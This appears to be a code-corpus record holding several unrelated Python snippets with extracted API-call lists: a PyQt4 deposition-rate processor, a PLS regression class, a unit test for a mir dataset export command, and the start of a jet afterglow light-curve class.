            dataArrayT = np.array(dataArray).T
            timespan = self.getTimeSpan(dataArrayT)
            depRates = self.getDepRates(timespan, dataArrayT)
            # normalize based on drifting center point
            rate0 = self.getXtalRate(3, dataArrayT).mean()
            rate = rate0
            if radius == radius1:
                if angle == 0 or self.changeZ:
                    # plot center point along with first set
                    # of data for this z-value
                    DEP_DATA.append((z, 0.0, 0.0, rate))
                    self.newData.emit((z, 0.0, 0.0, rate))
                    self.changeZ = False
                x = radius * np.cos(angle * np.pi/180.)
                y = radius * np.sin(angle * np.pi/180.)
                # rate1 corresponds to Xtal4 Rate
                rate = rate0 * depRates[2]/depRates[1]
            else:
                # outer radius: point is placed at the opposite azimuth (angle + pi)
                x = radius * np.cos(angle * np.pi/180. + np.pi)
                y = radius * np.sin(angle * np.pi/180. + np.pi)
                # rate2 corresponds to Xtal2 Rate
                rate = rate0 * depRates[0]/depRates[1]
            # store data points for initializing new graph
            DEP_DATA.append((z, x, y, rate))
            # indicate to existing graphs that there is
            # new data to display
            self.newData.emit((z, x, y, rate))
    """ helper function to correct for instrument noise in measuring z-value """
    def roundZ(self, zcol):
        zrnd=np.round(zcol, decimals=zndec)
        for i, zval in enumerate(zrnd):
            if zval not in filename_handler.FILE_INFO['Z_mm']:
                # flag values that match no expected z position
                zrnd[i] = -1
        return zrnd
    """ helper function to correct for instrument noise in measuring tilt """
    def roundT(self, tcol):
        trnd=np.round(tcol, decimals=tndec)
        for i, tval in enumerate(trnd):
            if tval not in filename_handler.FILE_INFO['TiltDeg']:
                # flag values that match no expected tilt position
                trnd[i] = -1
        return trnd
    """ gets range of valid rows in row buffer based on
    whether z and t values match experimental parameters """
    def getRowRange(self):
        data = np.array(self.rowBuffer)
        datacols = data.T
        # NOTE(review): `map` returns a list under Python 2 (this codebase uses
        # PyQt4); under Python 3 these would be iterators and break np.round
        # inside roundZ/roundT -- verify the target interpreter.
        zcol = map(float, datacols[self.zcolnum])
        tcol = map(float, datacols[self.tcolnum])
        inds_useful=np.where((self.roundZ(zcol)>=0)&(self.roundT(tcol)>=0))[0]
        # if rowRange is nonzero, send it
        if inds_useful.size:
            return (inds_useful[0], inds_useful[-1])
        # otherwise, send dummy rowRange to processData
        return (0, 0)
    """ gets time span of valid data set for given angle and z-value """
    def getTimeSpan(self, dataArrayT):
        datecol = getCol('Date')
        timecol = getCol('Time')
        datetimeTup = zip(dataArrayT[datecol], dataArrayT[timecol])
        # first and last timestamps bracket the valid data set
        startStr = datetimeTup[0][0] + ' ' + datetimeTup[0][1]
        endStr = datetimeTup[-1][0] + ' ' + datetimeTup[-1][1]
        durationObj = date_helpers.dateObjFloat(endStr) - date_helpers.dateObjFloat(startStr)
        return durationObj.total_seconds()
    """ helper function to return column of Xtal rates from valid data set """
    def getXtalRate(self, ratenum, dataArrayT):
        rcolnum = getCol('Xtal%d Rate' % ratenum)
        return np.array(map(float, dataArrayT[rcolnum]))
    """ helper function to compute all deposition rates
    as time-averaged Xtal rates """
    def getDepRates(self, timespan, dataArrayT):
        depRates = []
        # Xtal2, Xtal3 and Xtal4 rates averaged over the segment's time span
        for x in range(2,5):
            rateData = self.getXtalRate(x, dataArrayT)
            rateDiff = rateData[-1] - rateData[0]
            depRates += [rateDiff/timespan]
        return depRates
    """ re-initializes data sets and reader when a new
    spreadsheet file is loaded """
    def newFile(self, newfile):
        global DEP_DATA
        DEP_DATA = []
        self.rowBuffer = []
        if self.reader:
            self.reader.end()
        self.reader = datareader.DataReader(parent=self, filename=newfile)
        self.reader.lineRead.connect(self.newLineRead)
        self.reader.start()
        # re-initialize DATA_DICT column numbers used for data processing
        try:
            self.tcolnum = getCol('Src%d Motor Tilt Position' %int(filename_handler.FILE_INFO['Source']))
        except IndexError:
            self.srcError.emit(int(filename_handler.FILE_INFO['Source']))
        self.zcolnum = getCol('Platen Zshift Motor 1 Position')
        self.anglecolnum = getCol('Platen Motor Position')
    """ empties row buffer and kills reader when experiment has ended """
    def onEndExperiment(self):
        if self.rowBuffer:
            angle = round(float(self.rowBuffer[0][self.anglecolnum]))
            # NOTE(review): z rounded to 1 decimal here but to 2 decimals in
            # processRow -- confirm this asymmetry is intended.
            zval = round(float(self.rowBuffer[0][self.zcolnum]), 1)
            self.processData(zval, angle, radius1)
            self.processData(zval, angle, radius2)
            self.rowBuffer = []
        if self.reader:
            self.reader.end()
            self.reader = None
    """ kills both the reader and data processor threads;
    called when application exits """
    def end(self):
        if self.reader:
            self.reader.end()
        self.running = False
|
[
"date_helpers.dateObjFloat",
"numpy.sin",
"numpy.array",
"datareader.DataReader",
"numpy.cos",
"numpy.round",
"PyQt4.QtCore.pyqtSignal"
] |
[((538, 561), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['list'], {}), '(list)\n', (555, 561), False, 'from PyQt4 import QtCore\n'), ((631, 655), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['tuple'], {}), '(tuple)\n', (648, 655), False, 'from PyQt4 import QtCore\n'), ((671, 693), 'PyQt4.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['int'], {}), '(int)\n', (688, 693), False, 'from PyQt4 import QtCore\n'), ((944, 998), 'datareader.DataReader', 'datareader.DataReader', ([], {'parent': 'self', 'filename': 'self.file'}), '(parent=self, filename=self.file)\n', (965, 998), False, 'import datareader\n'), ((5046, 5076), 'numpy.round', 'np.round', (['zcol'], {'decimals': 'zndec'}), '(zcol, decimals=zndec)\n', (5054, 5076), True, 'import numpy as np\n'), ((5349, 5379), 'numpy.round', 'np.round', (['tcol'], {'decimals': 'tndec'}), '(tcol, decimals=tndec)\n', (5357, 5379), True, 'import numpy as np\n'), ((5699, 5723), 'numpy.array', 'np.array', (['self.rowBuffer'], {}), '(self.rowBuffer)\n', (5707, 5723), True, 'import numpy as np\n'), ((7523, 7575), 'datareader.DataReader', 'datareader.DataReader', ([], {'parent': 'self', 'filename': 'newfile'}), '(parent=self, filename=newfile)\n', (7544, 7575), False, 'import datareader\n'), ((6526, 6559), 'date_helpers.dateObjFloat', 'date_helpers.dateObjFloat', (['endStr'], {}), '(endStr)\n', (6551, 6559), False, 'import date_helpers\n'), ((6562, 6597), 'date_helpers.dateObjFloat', 'date_helpers.dateObjFloat', (['startStr'], {}), '(startStr)\n', (6587, 6597), False, 'import date_helpers\n'), ((3592, 3611), 'numpy.array', 'np.array', (['dataArray'], {}), '(dataArray)\n', (3600, 3611), True, 'import numpy as np\n'), ((4242, 4271), 'numpy.cos', 'np.cos', (['(angle * np.pi / 180.0)'], {}), '(angle * np.pi / 180.0)\n', (4248, 4271), True, 'import numpy as np\n'), ((4298, 4327), 'numpy.sin', 'np.sin', (['(angle * np.pi / 180.0)'], {}), '(angle * np.pi / 180.0)\n', (4304, 4327), True, 'import numpy as np\n'), ((4477, 4514), 'numpy.cos', 
'np.cos', (['(angle * np.pi / 180.0 + np.pi)'], {}), '(angle * np.pi / 180.0 + np.pi)\n', (4483, 4514), True, 'import numpy as np\n'), ((4541, 4578), 'numpy.sin', 'np.sin', (['(angle * np.pi / 180.0 + np.pi)'], {}), '(angle * np.pi / 180.0 + np.pi)\n', (4547, 4578), True, 'import numpy as np\n')]
|
from __future__ import print_function
import numpy as np
from ._PLSbase import plsbase as pls_base
from .utilities import nanmatprod, isValid
from .engines import pls as pls_engine
class pls(pls_base):
    """
    This is the classic multivariate NIPALS PLS algorithm.
    Parameters:
    X: {N, P} array like
        a table of N observations (rows) and P variables (columns) - The explanatory variables,
    Y: {N, Q} array like
        a table of N observations (rows) and Q variables (columns) - The dependent variables,
    a: int
        the number of PLS component to be fitted
    scaling: float, optional
        A number typically between 0.0 and 1.0 corresponding to the scaling, typical example are
        0.0 corresponds to mean centring
        0.5 corresponds to Pareto scaling
        1.0 corresponds to unit variance scaling
    cvfold: int, optional
        the number of folds in the cross-validation - default is 7
    Returns
    -------
    out : a pls2 object with a components
    Attributes:
        W : PLS weights table
        T : PLS scores table
        P : PLS loadings table
        C : PLS score regression coefficients
        B : PLS regression coefficients
        Yhat: model predicted Y
        Yhatcv: cross-validation predicted Y
        R2Y: Determination coefficients of Y
        Q2Ycol: Cross validation parameters per columns of Y
        Q2Ycum: Cumulative cross validation parameter
    Methods:
        scores(n), loadings(n), weights(n)
            n: int
                component id
            return the scores of the nth component
        predict(Xnew)
            Xnew: array like
                new observation with the same number of variables than X
            return predicted Y
    """
    def __init__(self, X, Y, ncp=1, cvfold=None, scaling=0):
        # Base class handles preprocessing/bookkeeping (scaling, CV setup,
        # missing-value detection flags used below).
        pls_base.__init__(self, X, Y, ncp=ncp, scaling=scaling, cvfold=cvfold)
        self.model = "pls"
        missingValues = False
        if self.missingValuesInX or self.missingValuesInY:
            # TODO: For now missing values in both X and Y are dealt the same way -> Improve this
            missingValues = True
        # NIPALS engine returns X/Y scores (T, U), weights (W), loadings (P),
        # Y-score coefficients (C) and regression coefficients (B).
        self.T, self.U, self.P, self.W, self.C, self.B = pls_engine(self.X, self.Y, self.ncp, missing_values=missingValues)
        # W* = W (P'W)^-1 maps preprocessed X directly onto the scores.
        self.Wstar = self.W @ np.linalg.inv(self.P.T @ self.W)
        # In-sample prediction (self.X was already preprocessed by the base class).
        self.Yhat = self.predict(self.X, preprocessing=False)
        self.R2Y, self.R2Ycol = self._calculateR2Y(self.Yhat)
        self.cross_validation(ncp=ncp)
        # Fraction of (preprocessed) X variance captured by T P'.
        self.R2X = np.sum(np.square(self.T @ self.P.T))/self.SSX
    def predict(self, Xnew, preprocessing=True, statistics=False, **kwargs):
        # isValid validates/coerces the input and returns its dimensions.
        Xnew, nnew, pxnew = isValid(Xnew, forPrediction=True)
        if preprocessing:
            # Centre and scale new data with the training statistics.
            Xnew = (Xnew - self.Xbar)
            Xnew /= np.power(self.Xstd, self.scaling)
        assert pxnew == self.px, "New observations do not have the same number of variables!!"
        if statistics:
            # Project onto the model plane and measure per-variable residuals.
            That = Xnew @ self.W
            Xpred = That @ self.P.T
            Xres = Xnew - Xpred
            Xnew2 = np.square(Xres)
            if np.isnan(Xnew2).any():
                # ignore missing entries when summing squared residuals
                ssrx = np.nansum(Xnew2, axis=0)
            else:
                ssrx = np.sum(Xnew2, axis=0)
            stats = {'That':That, 'ESS':ssrx}
        if self.B is not None:
            # Yhat = Xnew @ self.B
            if self.missingValuesInX:
                # nanmatprod skips NaNs in the matrix product
                Yhat = nanmatprod(Xnew, self.B)
            else:
                Yhat = Xnew @ self.B
            if preprocessing:
                # Undo Y scaling/centring to return predictions in original units.
                Yhat = Yhat * np.power(self.Ystd, self.scaling) + self.Ybar
        else:
            Yhat = None
        if statistics:
            return Yhat, stats
        else:
            return Yhat
|
[
"numpy.nansum",
"numpy.sum",
"numpy.power",
"numpy.square",
"numpy.isnan",
"numpy.linalg.inv"
] |
[((2506, 2538), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.P.T @ self.W)'], {}), '(self.P.T @ self.W)\n', (2519, 2538), True, 'import numpy as np\n'), ((3002, 3035), 'numpy.power', 'np.power', (['self.Xstd', 'self.scaling'], {}), '(self.Xstd, self.scaling)\n', (3010, 3035), True, 'import numpy as np\n'), ((3285, 3300), 'numpy.square', 'np.square', (['Xres'], {}), '(Xres)\n', (3294, 3300), True, 'import numpy as np\n'), ((2728, 2756), 'numpy.square', 'np.square', (['(self.T @ self.P.T)'], {}), '(self.T @ self.P.T)\n', (2737, 2756), True, 'import numpy as np\n'), ((3367, 3391), 'numpy.nansum', 'np.nansum', (['Xnew2'], {'axis': '(0)'}), '(Xnew2, axis=0)\n', (3376, 3391), True, 'import numpy as np\n'), ((3433, 3454), 'numpy.sum', 'np.sum', (['Xnew2'], {'axis': '(0)'}), '(Xnew2, axis=0)\n', (3439, 3454), True, 'import numpy as np\n'), ((3321, 3336), 'numpy.isnan', 'np.isnan', (['Xnew2'], {}), '(Xnew2)\n', (3329, 3336), True, 'import numpy as np\n'), ((3788, 3821), 'numpy.power', 'np.power', (['self.Ystd', 'self.scaling'], {}), '(self.Ystd, self.scaling)\n', (3796, 3821), True, 'import numpy as np\n')]
|
import os
import shutil
from typing import List, Tuple
import unittest
from google.protobuf import json_format
from mir.commands import exporting
from mir.protos import mir_command_pb2 as mirpb
from mir.tools import hash_utils, mir_storage_ops
from mir.tools.code import MirCode
from tests import utils as test_utils
class TestCmdExport(unittest.TestCase):
    """Unit tests for `exporting.CmdExport` (mir asset/annotation export)."""

    # life cycle
    def __init__(self, methodName: str) -> None:
        super().__init__(methodName=methodName)
        # sandbox directory layout used by this test case
        self._test_root = test_utils.dir_test_root(self.id().split('.')[-3:])
        self._assets_location = os.path.join(self._test_root, 'assets_location')
        self._dest_root = os.path.join(self._test_root, 'export_dest')
        self._gt_root = os.path.join(self._dest_root, 'gt_dir')
        self._mir_root = os.path.join(self._test_root, 'mir-repo')

    def setUp(self) -> None:
        self.__prepare_dirs()
        test_utils.prepare_labels(mir_root=self._mir_root, names=['freshbee', 'type1', 'person', 'airplane,aeroplane'])
        self.__prepare_mir_repo()
        self.__prepare_assets()
        return super().setUp()

    def tearDown(self) -> None:
        self.__deprepare_dirs()
        return super().tearDown()

    # private: prepare env
    def __prepare_dirs(self):
        test_utils.remake_dirs(self._test_root)
        test_utils.remake_dirs(self._assets_location)
        test_utils.remake_dirs(self._dest_root)
        test_utils.remake_dirs(self._mir_root)

    def __deprepare_dirs(self):
        if os.path.isdir(self._test_root):
            shutil.rmtree(self._test_root)

    def __prepare_assets(self):
        '''
        copy all assets from project to assets_location, assumes that `self._assets_location` already created
        '''
        image_paths = ['tests/assets/2007_000032.jpg', 'tests/assets/2007_000243.jpg']
        sha1sum_path_pairs = [(hash_utils.sha1sum_for_file(image_path), image_path)
                              for image_path in image_paths]  # type: List[Tuple[str, str]]
        for sha1sum, image_path in sha1sum_path_pairs:
            shutil.copyfile(image_path, os.path.join(self._assets_location, sha1sum))

    def __prepare_mir_repo(self):
        '''
        creates mir repo, assumes that `self._mir_root` already created
        '''
        test_utils.mir_repo_init(self._mir_root)
        test_utils.mir_repo_create_branch(self._mir_root, 'a')
        # metadatas
        metadatas_dict = {
            'attributes': {
                '430df22960b0f369318705800139fcc8ec38a3e4': {
                    'assetType': 'AssetTypeImageJpeg',
                    'width': 500,
                    'height': 281,
                    'imageChannels': 3
                },
                'a3008c032eb11c8d9ffcb58208a36682ee40900f': {
                    'assetType': 'AssetTypeImageJpeg',
                    'width': 500,
                    'height': 333,
                    'imageChannels': 3
                }
            }
        }
        mir_metadatas = mirpb.MirMetadatas()
        json_format.ParseDict(metadatas_dict, mir_metadatas)
        # annotations
        annotations_dict = {
            'task_annotations': {
                'a': {
                    'image_annotations': {
                        '430df22960b0f369318705800139fcc8ec38a3e4': {
                            'annotations': [{
                                'index': 0,
                                'box': {
                                    'x': 104,
                                    'y': 78,
                                    'w': 272,
                                    'h': 105
                                },
                                'class_id': 3,
                                'score': 1,
                                'anno_quality': 0.95,
                                'tags': {'fake tag name': 'fake tag data'},
                            }, {
                                'index': 1,
                                'box': {
                                    'x': 133,
                                    'y': 88,
                                    'w': 65,
                                    'h': 36
                                },
                                'class_id': 3,
                                'score': 1,
                                'anno_quality': 0.95,
                                'tags': {'fake tag name': 'fake tag data'},
                            }, {
                                'index': 2,
                                'box': {
                                    'x': 195,
                                    'y': 180,
                                    'w': 19,
                                    'h': 50
                                },
                                'class_id': 2,
                                'score': 1,
                                'anno_quality': 0.95,
                                'tags': {'fake tag name': 'fake tag data'},
                            }, {
                                'index': 3,
                                'box': {
                                    'x': 26,
                                    'y': 189,
                                    'w': 19,
                                    'h': 95
                                },
                                'class_id': 2,
                                'score': 1,
                                'anno_quality': 0.95,
                                'tags': {'fake tag name': 'fake tag data'},
                            }],
                        },
                        'a3008c032eb11c8d9ffcb58208a36682ee40900f': {
                            'annotations': [{
                                'index': 0,
                                'box': {
                                    'x': 181,
                                    'y': 127,
                                    'w': 94,
                                    'h': 67
                                },
                                'class_id': 3,
                                'score': 1,
                                'anno_quality': 0.95,
                                'tags': {'fake tag name': 'fake tag data'},
                            }],
                        },
                    }
                }
            },
            'image_cks': {
                'a3008c032eb11c8d9ffcb58208a36682ee40900f': {
                    'cks': {
                        'weather': 'sunny',
                    },
                    'image_quality': 0.5
                },
                '430df22960b0f369318705800139fcc8ec38a3e4': {
                    'cks': {
                        'weather': 'sunny',
                    },
                    'image_quality': 0.3
                }
            }
        }
        mir_annotations = mirpb.MirAnnotations()
        json_format.ParseDict(annotations_dict, mir_annotations)
        # tasks
        task = mir_storage_ops.create_task(task_type=mirpb.TaskType.TaskTypeImportData,
                                           task_id='a',
                                           message='test_tools_data_exporter_branch_a')
        # save and commit
        mir_datas = {
            mirpb.MirStorage.MIR_METADATAS: mir_metadatas,
            mirpb.MirStorage.MIR_ANNOTATIONS: mir_annotations,
        }
        mir_storage_ops.MirStorageOps.save_and_commit(mir_root=self._mir_root,
                                                      mir_branch='a',
                                                      his_branch='master',
                                                      mir_datas=mir_datas,
                                                      task=task)

    # private: helpers
    def __make_fake_args(self, asset_format: str, valid_dirs: bool = True):
        """Build the argparse-like namespace that CmdExport expects.

        asset_format: 'raw' or 'lmdb'.
        valid_dirs: when False, leave all destination/location paths empty in
            order to exercise the argument-validation failure path.
        """
        fake_args = type('', (), {})()
        fake_args.mir_root = self._mir_root
        fake_args.asset_dir = self._dest_root if valid_dirs else ''
        fake_args.annotation_dir = self._dest_root if valid_dirs else ''
        fake_args.gt_dir = self._gt_root if valid_dirs else ''
        fake_args.media_location = self._assets_location if valid_dirs else ''
        fake_args.src_revs = 'a@a'
        fake_args.dst_rev = ''
        fake_args.format = 'voc'
        fake_args.asset_format = asset_format
        fake_args.in_cis = 'person'
        fake_args.work_dir = ''
        return fake_args

    def test_normal_00(self):
        # normal case: voc:raw
        result = exporting.CmdExport(self.__make_fake_args('raw')).run()
        self.assertEqual(MirCode.RC_OK, result)

        # normal case: voc:lmdb
        result = exporting.CmdExport(self.__make_fake_args('lmdb')).run()
        self.assertEqual(MirCode.RC_OK, result)

        # abnormal case: no asset_dir, annotation_dir, media_location
        result = exporting.CmdExport(self.__make_fake_args('raw', valid_dirs=False)).run()
        self.assertNotEqual(MirCode.RC_OK, result)
|
[
"tests.utils.mir_repo_init",
"shutil.rmtree",
"os.path.isdir",
"mir.protos.mir_command_pb2.MirMetadatas",
"tests.utils.prepare_labels",
"mir.protos.mir_command_pb2.MirAnnotations",
"google.protobuf.json_format.ParseDict",
"tests.utils.remake_dirs",
"mir.tools.mir_storage_ops.create_task",
"mir.tools.mir_storage_ops.MirStorageOps.save_and_commit",
"mir.commands.exporting.CmdExport",
"tests.utils.mir_repo_create_branch",
"os.path.join",
"mir.tools.hash_utils.sha1sum_for_file"
] |
[((585, 633), 'os.path.join', 'os.path.join', (['self._test_root', '"""assets_location"""'], {}), "(self._test_root, 'assets_location')\n", (597, 633), False, 'import os\n'), ((660, 704), 'os.path.join', 'os.path.join', (['self._test_root', '"""export_dest"""'], {}), "(self._test_root, 'export_dest')\n", (672, 704), False, 'import os\n'), ((729, 768), 'os.path.join', 'os.path.join', (['self._dest_root', '"""gt_dir"""'], {}), "(self._dest_root, 'gt_dir')\n", (741, 768), False, 'import os\n'), ((794, 835), 'os.path.join', 'os.path.join', (['self._test_root', '"""mir-repo"""'], {}), "(self._test_root, 'mir-repo')\n", (806, 835), False, 'import os\n'), ((904, 1019), 'tests.utils.prepare_labels', 'test_utils.prepare_labels', ([], {'mir_root': 'self._mir_root', 'names': "['freshbee', 'type1', 'person', 'airplane,aeroplane']"}), "(mir_root=self._mir_root, names=['freshbee',\n 'type1', 'person', 'airplane,aeroplane'])\n", (929, 1019), True, 'from tests import utils as test_utils\n'), ((1278, 1317), 'tests.utils.remake_dirs', 'test_utils.remake_dirs', (['self._test_root'], {}), '(self._test_root)\n', (1300, 1317), True, 'from tests import utils as test_utils\n'), ((1326, 1371), 'tests.utils.remake_dirs', 'test_utils.remake_dirs', (['self._assets_location'], {}), '(self._assets_location)\n', (1348, 1371), True, 'from tests import utils as test_utils\n'), ((1380, 1419), 'tests.utils.remake_dirs', 'test_utils.remake_dirs', (['self._dest_root'], {}), '(self._dest_root)\n', (1402, 1419), True, 'from tests import utils as test_utils\n'), ((1428, 1466), 'tests.utils.remake_dirs', 'test_utils.remake_dirs', (['self._mir_root'], {}), '(self._mir_root)\n', (1450, 1466), True, 'from tests import utils as test_utils\n'), ((1511, 1541), 'os.path.isdir', 'os.path.isdir', (['self._test_root'], {}), '(self._test_root)\n', (1524, 1541), False, 'import os\n'), ((2296, 2336), 'tests.utils.mir_repo_init', 'test_utils.mir_repo_init', (['self._mir_root'], {}), '(self._mir_root)\n', (2320, 2336), 
True, 'from tests import utils as test_utils\n'), ((2345, 2399), 'tests.utils.mir_repo_create_branch', 'test_utils.mir_repo_create_branch', (['self._mir_root', '"""a"""'], {}), "(self._mir_root, 'a')\n", (2378, 2399), True, 'from tests import utils as test_utils\n'), ((3011, 3031), 'mir.protos.mir_command_pb2.MirMetadatas', 'mirpb.MirMetadatas', ([], {}), '()\n', (3029, 3031), True, 'from mir.protos import mir_command_pb2 as mirpb\n'), ((3040, 3092), 'google.protobuf.json_format.ParseDict', 'json_format.ParseDict', (['metadatas_dict', 'mir_metadatas'], {}), '(metadatas_dict, mir_metadatas)\n', (3061, 3092), False, 'from google.protobuf import json_format\n'), ((6870, 6892), 'mir.protos.mir_command_pb2.MirAnnotations', 'mirpb.MirAnnotations', ([], {}), '()\n', (6890, 6892), True, 'from mir.protos import mir_command_pb2 as mirpb\n'), ((6901, 6957), 'google.protobuf.json_format.ParseDict', 'json_format.ParseDict', (['annotations_dict', 'mir_annotations'], {}), '(annotations_dict, mir_annotations)\n', (6922, 6957), False, 'from google.protobuf import json_format\n'), ((6990, 7124), 'mir.tools.mir_storage_ops.create_task', 'mir_storage_ops.create_task', ([], {'task_type': 'mirpb.TaskType.TaskTypeImportData', 'task_id': '"""a"""', 'message': '"""test_tools_data_exporter_branch_a"""'}), "(task_type=mirpb.TaskType.TaskTypeImportData,\n task_id='a', message='test_tools_data_exporter_branch_a')\n", (7017, 7124), False, 'from mir.tools import hash_utils, mir_storage_ops\n'), ((7396, 7539), 'mir.tools.mir_storage_ops.MirStorageOps.save_and_commit', 'mir_storage_ops.MirStorageOps.save_and_commit', ([], {'mir_root': 'self._mir_root', 'mir_branch': '"""a"""', 'his_branch': '"""master"""', 'mir_datas': 'mir_datas', 'task': 'task'}), "(mir_root=self._mir_root,\n mir_branch='a', his_branch='master', mir_datas=mir_datas, task=task)\n", (7441, 7539), False, 'from mir.tools import hash_utils, mir_storage_ops\n'), ((8315, 8345), 'mir.commands.exporting.CmdExport', 'exporting.CmdExport', 
(['fake_args'], {}), '(fake_args)\n', (8334, 8345), False, 'from mir.commands import exporting\n'), ((8959, 8989), 'mir.commands.exporting.CmdExport', 'exporting.CmdExport', (['fake_args'], {}), '(fake_args)\n', (8978, 8989), False, 'from mir.commands import exporting\n'), ((9646, 9676), 'mir.commands.exporting.CmdExport', 'exporting.CmdExport', (['fake_args'], {}), '(fake_args)\n', (9665, 9676), False, 'from mir.commands import exporting\n'), ((1555, 1585), 'shutil.rmtree', 'shutil.rmtree', (['self._test_root'], {}), '(self._test_root)\n', (1568, 1585), False, 'import shutil\n'), ((1871, 1910), 'mir.tools.hash_utils.sha1sum_for_file', 'hash_utils.sha1sum_for_file', (['image_path'], {}), '(image_path)\n', (1898, 1910), False, 'from mir.tools import hash_utils, mir_storage_ops\n'), ((2111, 2155), 'os.path.join', 'os.path.join', (['self._assets_location', 'sha1sum'], {}), '(self._assets_location, sha1sum)\n', (2123, 2155), False, 'import os\n')]
|
from numpy import *
import joelib.constants.constants as cts
from joelib.physics.synchrotron_afterglow import *
from scipy.stats import binned_statistic
from scipy.interpolate import interp1d
from tqdm import tqdm
class jetHeadUD(adiabatic_afterglow):
###############################################################################################
# Methods for initializing the cells in the jet head
###############################################################################################
    def __init__(self, EE, Gam0, nn, epE, epB, pp, DD, steps, evolution, nlayers, joAngle, shell_type='thin', Rb=1.):#, obsAngle=0.0):
        """
        Partition the jet head into angular cells and initialise the
        underlying adiabatic afterglow.
        EE: total energy; divided evenly among the cells (self.ee).
        joAngle: jet opening angle (presumably radians -- confirm with callers).
        nlayers: number of concentric layers used for the partition.
        """
        self.nlayers = nlayers                      # Number of layers for the partition
        #self.nn1 = nn1                             # Number of cells in the first layer
        self.__totalCells()                         # obtain self.ncells
        self.joAngle = joAngle                      # Jet opening angle
        #self.obsAngle = obsAngle                   # Angle of jet axis with respect to line of sight
        self.angExt = 2.*pi*(1.-cos(joAngle))       # Solid angle covered by the jet head
        self.cellSize = self.angExt/self.ncells     # Angular size of each cell
        self.__makeCells()                          # Generate the cells: calculate the angular positions of the shells
        adiabatic_afterglow.__init__(self, EE, Gam0, nn, epE, epB, pp, DD, steps, evolution, shell_type, Rb)
        self.ee = EE/self.ncells                    # Energy per cell
    def __makeCells(self):
        """
        This method generates the individual cells: positions of borders between cells
        and angular positions of the cells themselves.
        """
        self.layer   = array([])    # layer index of each cell
        self.thetas  = array([])    # polar borders between layers
        self.phis    = array([])    # azimuthal borders between cells
        self.cthetas = array([])    # polar centre of each cell
        self.cphis   = array([])    # azimuthal centre of each cell
        fac1 = arange(0,self.nlayers+1)/float(self.nlayers)        # Numerical factor for use during execution
        # NOTE(review): layer borders built from arcsin with joAngle/4 --
        # presumably joAngle stores the full (two-sided) opening angle;
        # confirm the convention before changing.
        self.thetas = 2.*arcsin(fac1*sin(self.joAngle/4.))          # Calculate the propagation angle with respect to jet axis
        for ii in range(self.nlayers):                             # Loop over layers and populate the arrays
            num = self.cellsInLayer(ii)
            self.phis = append(self.phis, arange(0,num+1)*2.*pi/num)     # Phi value of the edges
            self.layer = append(self.layer,ones(num)*(ii+1))            # Layer on which the cells are
            self.cthetas = append(self.cthetas,ones(num)*0.5*(self.thetas[ii]+self.thetas[ii+1]))   # Central theta values of the cells
            self.cphis = append(self.cphis,(arange(0,num)+0.5)*2.*pi/num )    # Central phi values of the cells
            #num = int(round(self.cellsInLayer(ii)/2))
            #self.layer = append(self.layer,ones(num+1)*(ii+1))            # Layer on which the phi edges are
            #self.phis = append(self.phis, arange(0,num+1)*2.*pi/num)     # Phi value of the edges
            #self.cthetas = append(self.cthetas,ones(num)*0.5*(self.thetas[ii]+self.thetas[ii+1]))   # Central theta values
            #self.cphis = append(self.cphis,(arange(0,num)+0.5)*pi/num )    # Central phi values
def __totalCells(self):
tot = 0
for ii in range(0,self.nlayers):
tot = tot + self.cellsInLayer(ii)
#tot = tot + int(round(self.cellsInLayer(ii)/2))
self.ncells = tot
###############################################################################################
# Methods used by initializers and for getting different physics and general methods not used by initializers
###############################################################################################
def cellsInLayer(self, ii):
"""
Return number of cells in layer ii
"""
return (2*ii+1)
def obsangle(self, theta_obs):
"""
Return the cosine of the observer angle for the different shockwave segments and and
and observer at and angle theta_obs with respect to the jet axis
(contained in yz plane)
"""
#u_obs_x, u_obs_y, u_obs_z = 0., sin(theta_obs), cos(theta_obs)
u_obs_y, u_obs_z = sin(theta_obs), cos(theta_obs)
#seg_x =
seg_y = sin(self.cthetas)*sin(self.cphis)
seg_z = cos(self.cthetas)
#return arccos(u_obs_x*seg_x + u_obs_y*seg_y + u_obs_z*seg_z)
return u_obs_y*seg_y + u_obs_z*seg_z
def obsangle_cj(self, theta_obs):
"""
Return the cosine of the observer angle for the different shockwave
segments in the counter jet and observer at an angle theta_obs with respect to the jet axis
(contained in yz plane)
"""
#u_obs_x, u_obs_y, u_obs_z = 0., sin(theta_obs), cos(theta_obs)
u_obs_y, u_obs_z = sin(theta_obs), cos(theta_obs)
#seg_x =
seg_y = sin(pi-self.cthetas)*sin(self.cphis)
seg_z = cos(pi-self.cthetas)
#return arccos(u_obs_x*seg_x + u_obs_y*seg_y + u_obs_z*seg_z)
return u_obs_y*seg_y + u_obs_z*seg_z
def dopplerFactor(self, cosa, beta):
"""
Calculate the doppler factors of the different jethead segments
cosa -> cosine of observeration angle, obtained using obsangle
"""
return (1.-beta)/(1.-beta*cosa)
def light_curve_adiabatic(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if type(obsFreqs)==float:
obsFreqs = array([obsFreqs])
calpha = self.obsangle(theta_obs)
alpha = arccos(calpha)
calpha_cj = self.obsangle_cj(theta_obs)
alpha_cj = arccos(calpha_cj)
if self.evolution == 'adiabatic':
max_Tobs = max(obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, max(alpha)))/cts.sTd
max_Tobs_cj = max(obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, max(alpha_cj)))/cts.sTd
elif self.evolution == 'peer':
max_Tobs = max(obsTime_offAxis_General(self.RRs, self.TTs, max(alpha)))/cts.sTd
max_Tobs_cj = max(obsTime_offAxis_General(self.RRs, self.TTs, max(alpha_cj)))/cts.sTd
if (ttf>max_Tobs or ttf>max_Tobs_cj):
print("ttf larger than maximum observable time. Adjusting value.")
ttf = min(max_Tobs, max_Tobs_cj)
lt0 = log10(tt0*cts.sTd) # Convert to seconds and then logspace
ltf = log10(ttf*cts.sTd) # Convert to seconds and then logspace
tts = logspace(lt0, ltf+(ltf-lt0)/num, num) # Timeline on which the flux is evaluated.
light_curve = zeros([len(obsFreqs), num])
light_curve_RS = zeros([len(obsFreqs), num])
light_curve_CJ = zeros([len(obsFreqs), num])
for ii in tqdm(range(self.ncells)):
#for ii in range(self.ncells):
onAxisTint = interp1d(self.RRs, self.TTs)
ttobs = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha[ii])
ttobs_cj = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha_cj[ii])
filTM = where(tts<=max(ttobs))[0]
